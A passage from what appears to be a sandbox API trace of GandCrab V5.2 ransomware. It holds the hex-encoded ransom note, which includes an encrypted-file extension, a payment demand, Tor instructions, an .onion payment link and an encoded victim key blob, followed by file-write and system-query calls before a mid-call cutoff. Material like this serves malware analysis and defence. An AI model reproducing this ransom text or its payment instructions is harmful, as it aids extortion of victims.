(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.148] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0079.149] CloseHandle (hObject=0x2dc) returned 1 [0079.149] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.149] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.149] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x18, wMilliseconds=0x1d3)) [0079.150] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.150] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.150] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.150] wsprintfW (in: 